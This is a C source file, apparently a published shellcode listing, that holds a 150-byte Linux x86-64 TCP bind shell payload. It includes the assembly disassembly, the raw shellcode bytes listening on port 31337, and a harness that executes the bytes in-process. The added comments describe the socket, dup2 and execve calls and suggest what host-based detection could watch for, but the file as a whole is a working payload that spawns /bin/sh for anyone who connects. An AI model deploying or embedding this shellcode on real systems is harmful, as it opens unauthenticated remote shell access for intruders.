/*
Title : tcpbindshell (150 bytes)
Date : 04 October 2013
Author : Russell Willis <[email protected]>
Tested on: Linux/x86_64 (SMP Debian 3.2.46-1+deb7u1 x86_64 GNU/Linux)
$ objdump -D tcpbindshell -M intel
tcpbindshell: file format elf64-x86-64
Disassembly of section .text:
0000000000400080 <_start>:
400080: 48 31 c0 xor rax,rax
400083: 48 31 ff xor rdi,rdi
400086: 48 31 f6 xor rsi,rsi
400089: 48 31 d2 xor rdx,rdx
40008c: 4d 31 c0 xor r8,r8
40008f: 6a 02 push 0x2
400091: 5f pop rdi
400092: 6a 01 push 0x1
400094: 5e pop rsi
400095: 6a 06 push 0x6
400097: 5a pop rdx
400098: 6a 29 push 0x29
40009a: 58 pop rax
40009b: 0f 05 syscall
40009d: 49 89 c0 mov r8,rax
4000a0: 4d 31 d2 xor r10,r10
4000a3: 41 52 push r10
4000a5: 41 52 push r10
4000a7: c6 04 24 02 mov BYTE PTR [rsp],0x2
4000ab: 66 c7 44 24 02 7a 69 mov WORD PTR [rsp+0x2],0x697a
4000b2: 48 89 e6 mov rsi,rsp
4000b5: 41 50 push r8
4000b7: 5f pop rdi
4000b8: 6a 10 push 0x10
4000ba: 5a pop rdx
4000bb: 6a 31 push 0x31
4000bd: 58 pop rax
4000be: 0f 05 syscall
4000c0: 41 50 push r8
4000c2: 5f pop rdi
4000c3: 6a 01 push 0x1
4000c5: 5e pop rsi
4000c6: 6a 32 push 0x32
4000c8: 58 pop rax
4000c9: 0f 05 syscall
4000cb: 48 89 e6 mov rsi,rsp
4000ce: 48 31 c9 xor rcx,rcx
4000d1: b1 10 mov cl,0x10
4000d3: 51 push rcx
4000d4: 48 89 e2 mov rdx,rsp
4000d7: 41 50 push r8
4000d9: 5f pop rdi
4000da: 6a 2b push 0x2b
4000dc: 58 pop rax
4000dd: 0f 05 syscall
4000df: 59 pop rcx
4000e0: 4d 31 c9 xor r9,r9
4000e3: 49 89 c1 mov r9,rax
4000e6: 4c 89 cf mov rdi,r9
4000e9: 48 31 f6 xor rsi,rsi
4000ec: 6a 03 push 0x3
4000ee: 5e pop rsi
00000000004000ef <doop>:
4000ef: 48 ff ce dec rsi
4000f2: 6a 21 push 0x21
4000f4: 58 pop rax
4000f5: 0f 05 syscall
4000f7: 75 f6 jne 4000ef <doop>
4000f9: 48 31 ff xor rdi,rdi
4000fc: 57 push rdi
4000fd: 57 push rdi
4000fe: 5e pop rsi
4000ff: 5a pop rdx
400100: 48 bf 2f 2f 62 69 6e movabs rdi,0x68732f6e69622f2f
400107: 2f 73 68
40010a: 48 c1 ef 08 shr rdi,0x8
40010e: 57 push rdi
40010f: 54 push rsp
400110: 5f pop rdi
400111: 6a 3b push 0x3b
400113: 58 pop rax
400114: 0f 05 syscall
Code is not optimal; this is left as an exercise to the reader ;^)
*/
#include <stdio.h>
/* Listening port as two raw bytes in network byte order: 0x7a 0x69 = 31337.
 * These two bytes are the immediate of the `mov WORD PTR [rsp+0x2],0x697a`
 * at 0x4000ab in the disassembly above, so changing PORT changes only that
 * instruction; the payload length stays 150 bytes. */
#define PORT "\x7a\x69" /* 31337 */
/* Raw x86-64 machine code, byte-for-byte the .text section disassembled in
 * the header comment. It is written as a C string literal, so sizeof(code)
 * counts a trailing NUL; the payload proper is sizeof(code) - 1 = 150 bytes
 * (9 lines of 16 bytes plus the final 6).
 *
 * From a monitoring standpoint the observable effect, per the syscall numbers
 * in the listing (socket/bind/listen/accept/dup2/execve), is a process that
 * opens a listening TCP socket on the port above and then replaces itself
 * with /bin/sh whose stdin/stdout/stderr are bound to the accepted connection.
 * A new listener on an unusual high port from a non-network process, followed
 * by a shell exec, is the behaviour a host-based detection would key on. */
unsigned char code[] = \
"\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x4d\x31\xc0\x6a"
"\x02\x5f\x6a\x01\x5e\x6a\x06\x5a\x6a\x29\x58\x0f\x05\x49\x89\xc0"
"\x4d\x31\xd2\x41\x52\x41\x52\xc6\x04\x24\x02\x66\xc7\x44\x24\x02"
PORT"\x48\x89\xe6\x41\x50\x5f\x6a\x10\x5a\x6a\x31\x58\x0f\x05"
"\x41\x50\x5f\x6a\x01\x5e\x6a\x32\x58\x0f\x05\x48\x89\xe6\x48\x31"
"\xc9\xb1\x10\x51\x48\x89\xe2\x41\x50\x5f\x6a\x2b\x58\x0f\x05\x59"
"\x4d\x31\xc9\x49\x89\xc1\x4c\x89\xcf\x48\x31\xf6\x6a\x03\x5e\x48"
"\xff\xce\x6a\x21\x58\x0f\x05\x75\xf6\x48\x31\xff\x57\x57\x5e\x5a"
"\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54"
"\x5f\x6a\x3b\x58\x0f\x05";
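/*
 * Test harness: prints the payload length and then jumps into the `code`
 * byte array in the current process. Note that this runs the payload in the
 * harness's own process, so a successful run opens the listening socket
 * described in the header comment on the machine executing the harness.
 */
int
main(void)
{
	/* sizeof counts the string literal's terminating NUL; subtract it.
	 * %zu matches size_t directly, avoiding the narrowing (int) cast. */
	printf("Shellcode Length: %zu\n", sizeof code - 1);

	/* Indirect call into a writable data array. This only succeeds when the
	 * .data segment is mapped executable; under NX / W^X, the default on
	 * hardened toolchains, the call faults at this line. The listing does not
	 * show the build flags it was compiled with, so that assumption is
	 * implicit. The payload never returns on success (it execve()s), so the
	 * return type is void and a proper prototype is used instead of the
	 * obsolescent `int (*)()` non-prototype declaration. */
	void (*ret)(void) = (void (*)(void))code;
	ret();

	/* Reached only if the payload returns instead of replacing the process. */
	return 0;
}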